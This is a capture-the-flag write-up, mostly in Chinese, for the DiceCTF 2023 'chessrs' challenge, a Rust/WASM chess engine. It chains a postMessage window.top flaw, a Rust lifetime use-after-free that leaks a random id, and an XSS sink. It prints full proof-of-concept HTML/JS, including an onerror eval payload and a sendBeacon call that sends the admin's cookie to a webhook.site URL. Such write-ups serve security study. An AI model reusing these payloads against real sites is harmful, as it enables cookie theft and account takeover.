

A Rust WASM XSS pwn challenge.

题目给了完整的 Cargo 工作区,Rust 对于 wasm 支持可以直接用 wasm-pack 安装工具包。

cargo build 指定 target 为 wasm32-unknown-unknown 就行,或者直接使用工具包 wasm-pack build

题目环境是一个用 rust http 服务 axum 起的一个 spa 路由。index.html 嵌入 iframe engine.html,然后用 onMessage/postMessage 两者交互,而 engine.html 则通过胶水函数与 wasm 模块交互。

index.html <-> engine.html <-> wasm module
// index.html to engine.html
const engine = $("#engine")[0].contentWindow;
const send = (msg) => engine.postMessage({ ...msg, id }, location.origin);
window.onmessage = (e) => {
    send({ ... });
// engine.html to index.html
window.onmessage = (e) => {
    e.source.postMessage(chess.handle(JSON.stringify(e.data)), e.origin);

window.top.postMessage("ready", "*");

初始化的时候,engineindex 发送 ready 信号,然后其使用的窗口是 window.top 而不是 window.parent,前者会直接返回最顶层的窗口实例,因此可以构造自己的恶意页面嵌套题目的 index.html,此时 engineindex 之间的通信就变成了 engine 与恶意页面之间的通信。


可以发现在 error 的时候会直接导致 html 渲染,是一个明显的 XSS 点。

// game.js#L60
if (e.data.type === "error") {
    send({ type: "get_state" });

直接发送 postMessage 便能造成 XSS。

window.postMessage({type: "error", data: "<script>alert(1)</script>"})


然而在题目环境中有一个 id 的限制,它会在每次页面加载时随机生成,并会对除了 ready 之外的所有消息进行 id 校验,如果不匹配则直接返回。

const id = [...crypto.getRandomValues(new Uint8Array(16))].map(v => alphabet[v % alphabet.length]).join("");

if (e.data.id !== id) {

所以需要通过某种方法获取到 id

这里利用到了 Rust 的一个 soundness hole,其由于生命周期标注问题从而导致了悬垂指针,让我们能够 uaf 从而在堆上泄露数据。


// game.rs
pub struct Game<'a> {
    pub start_type: StartType,
    pub start: &'a str,
    pub moves: Vec<Move>,
fn validate_fen<'a, 'b>(fen: &'b str, default: &'a &'b str) -> (StartType, &'a str) {
    match fen.parse::<Fen>() {
        Ok(_) => (StartType::Fen, fen),
        Err(_) => (StartType::Fen, default),
impl ChessGame for Game<'_> {
    fn start(init: &str) -> Self {
        let mut validator: fn(_, _) -> (StartType, &'static str) = validate_fen;
        if init.contains(';') {
            validator = validate_epd;
        let data: (StartType, &str) = validator(init, &DEFAULT_FEN);
        Game {
            start_type: data.0,
            start: data.1,
            moves: Vec::new(),

wasm 中有个 game 结构体,查看其标注可以知道它与 start 字段的生命周期是绑定的;对于 validate_fen 来说有两个生命周期标注,而在 Game::start 调用的时候,重新声明了 'a 的生命周期为 'static 即全局生命周期,但是传入是 init 显然并不是全局生命周期,它会在 handler::init 调用结束后被 drop,因此造成了悬垂指针。

一个 demo:

<!DOCTYPE html>
        <iframe src="about:blank" name="alert(1)"></iframe>
            const sleep = (ms) => new Promise(r => setTimeout(r, ms));

            const game = window.frames[0];
            game.location = "http://localhost:1337";

            window.onmessage = async (e) => {
                if (e.data === "ready") {
                    // 先构造一个 game
                    e.source.postMessage({ id: "SilentE", type: "init", data: "8/8/8/8/8/8/8/8 " }, "*");
                    await sleep(250);
                    // 调用题目的 game
                    game.postMessage("ready", "*");
                    await sleep(250);
                    // 触发 error 拿到泄露数据
                    e.source.postMessage({ id: "SilentE", type: "init" }, "*");

                if (e.data.type === "error") {
                    console.log(e.data.id + e.data.data);

wasm 的内存是由 js 的 ArrayBuffer 管理,但其具体的分配还是由源语言来决定,对于 Rust 来说,wasm-bindgen 导出了 __wbindgen_malloc,其内部实现是用的标准库中的 alloc

Why do these values work? I didn't want to trace heap allocations, so... ¯\(ツ)/¯

由于目前缺少对于 wasm 的直接调试,所以感觉只有 fuzz 比较有效,通过不断调试,能够拿到 id 的前 14 位:

e.source.postMessage({ id: "A".repeat(16), type: "init" }, "*");
await sleep(100);
e.source.postMessage({ id: "SilentE", type: "init", data: "8/8/8/8/8/8/8/8 " }, "*");
await sleep(100);
game.postMessage("ready", "*");
await sleep(100);
e.source.postMessage({ id: "SilentE", type: "init"}, "*");




e.source.postMessage({ id: "A".repeat(0), type: "init", data: "8/k7/8/8/8/8/K7/8 w - - 0 1" +" ".repeat(1) }, "*");
await sleep(250);
e.source.postMessage({ id: "B".repeat(13), type: "init", data: "8/k7/8/8/8/8/K7/8 w - - 0 1" +" ".repeat(34) }, "*");
await sleep(250);
window.frames[0].postMessage("ready", "*");
await sleep(500);
e.source.postMessage({ id: "B".repeat(13), type: "init" }, "*");
Rogue Waves
async function main() {
    // Wait for the ready message to get sent to us from the engine
    let engine = await new Promise(res => { onmessage = (e) => res(e.source) })

    // Spam the engine with init requests from different clients
    // (each one uses a different id)
    for (let i = 0; i < lets.length; i++) {
        // Each of these inits will trigger the UAF because 
        // it has data field set to a valid chess string
        // (it won't use the default start string) 
        // To increase chances of success, we use a valid
        // chess string that is the same length as 
        // game.js's id.
            type: 'init', 
            data: '8/8/8/8/8/8/8/8 ', 
            id: lets[i],
        }, '*')

        await new Promise(res => setTimeout(res, 10))

        // These inits won't trigger the UAF because we are not sending an
        // init string, but it's part of the fuzzing routine that we found to work.
        // You know what they say, "garbage in, flag out."
            type: 'init', 
            id: lets[i].repeat(16)
        }, '*') 

        await new Promise(res => setTimeout(res, 10))

    await new Promise(res => setTimeout(res, 10))

    // Send the ready message to game.js so that
    // it will send its own init message to engine,
    // allocating its id using the engine's allocator.
    game.contentWindow.postMessage('ready', '*')

    await new Promise(res => setTimeout(res, 100))

    // Now re-init all the clients that had the UAF
    // Hopefully one of them had their UAF
    // overwritten by game.js's id.
    for (let i = 0; i < lets.length; i++) {
            type: 'init',
            id: lets[i]
        }, '*')

Then, with this leak, we can send an error message to the iframe at https://chessrs.mc.ax, and get JS execution on that page! Now there's only one problem left - SameSite. Since the flag is in the admin's cookie and is set with just document.cookie, it is SameSite Lax by default, which means that the cookie isn't in the iframe. I know that one team got really tripped up by this.

题目中 puppeteer 默认 cookie 策略是 SameSite Lax,即其 iframe 中不会存在 cookie,可以直接使用 window.open('/') 打开新的一个标签页从而得到 flag。

<iframe src="about:blank" name="navigator.sendBeacon('https://webhook.site/xxx', window.open('/').document.cookie)"></iframe>

完整 poc

<!DOCTYPE html>
        <iframe src="about:blank" name="navigator.sendBeacon('https://webhook.site/8816666e-3cb1-4e6a-b58a-a5d2465b5a0d', window.open('/').document.cookie)"></iframe>
            const sleep = (ms) => new Promise(r => setTimeout(r, ms));

            window.frames[0].location = "http://localhost:1337";

            window.onmessage = async (e) => {
                if (e.data === "ready") {
                    e.source.postMessage({ id: "A".repeat(0), type: "init", data: "8/k7/8/8/8/8/K7/8 w - - 0 1" + " ".repeat(1) }, "*");
                    await sleep(250);
                    e.source.postMessage({ id: "B".repeat(13), type: "init", data: "8/k7/8/8/8/8/K7/8 w - - 0 1" + " ".repeat(34) }, "*");
                    await sleep(250);
                    window.frames[0].postMessage("ready", "*");
                    await sleep(500);
                    e.source.postMessage({ id: "B".repeat(13), type: "init" }, "*");
                    await sleep(250);

                if (e.data.type === "error") {
                    console.log(e.data.id + e.data.data);
                    const leak = /"(.*?)"/.exec(e.data.data)[1].split(" ")[0].slice(0, 16);
                        id: leak,
                        type: "error",
                        data: `<img src=x onerror=eval(window.name) />`
                    }, "*");


  • https://github.com/dicegang/dicectf-2023-challenges/tree/main/pwn/chessrs
  • https://rgwv.team/writeups/1838/chessrs/
  • https://brycec.me/posts/dicectf_2023_challenges#chessrs
  • https://w0y.at/writeup/2023/02/05/dicectf-2023-chessrs.html

最后更新: March 15, 2023 10:52:57
创建日期: February 15, 2023 14:15:52
